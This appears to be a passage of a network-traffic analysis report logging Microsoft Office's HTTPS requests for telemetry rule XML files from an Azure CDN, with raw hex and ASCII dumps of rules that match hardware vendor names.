                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        24192.168.2.44977713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:58 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 5f7101d7-901e-0048-4fd5-33b800000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153658Z-174f7845968j9dchhC1EWRfe74000000052000000000264r
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        25192.168.2.44977913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:58 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 2f59f113-901e-002a-1dd5-337a27000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153658Z-174f7845968nxc96hC1EWRspw800000004ug00000000h2p5
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:58 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        26192.168.2.44978213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                        x-ms-request-id: cd0babfe-b01e-0002-56d5-331b8f000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153659Z-174f7845968j9dchhC1EWRfe7400000004z000000000ddfw
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        27192.168.2.44978113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 7eed3662-201e-003f-1ad5-336d94000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153659Z-174f7845968t42glhC1EWRa36w00000004u000000000k9cz
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        28192.168.2.44978313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 464
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 4e338842-401e-0016-31d5-3353e0000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153659Z-174f7845968glpgnhC1EWR7uec00000005cg0000000004ws
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        29192.168.2.44978013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 33d00c7b-501e-007b-28d5-335ba2000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153659Z-174f7845968cdxdrhC1EWRg0en000000052g00000000ecr8
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        30192.168.2.44978513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 8377dd30-c01e-00a1-3ad5-337e4a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153659Z-174f7845968pf68xhC1EWRr4h800000005b000000000gvut
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        31192.168.2.44978613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 2f59f176-901e-002a-79d5-337a27000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153659Z-174f7845968j6t2phC1EWRcfe8000000056g00000000q12c
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        32192.168.2.44978413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:36:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:36:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 31c5dc94-101e-008d-18d5-3392e5000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153659Z-174f7845968j9dchhC1EWRfe740000000520000000002674
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
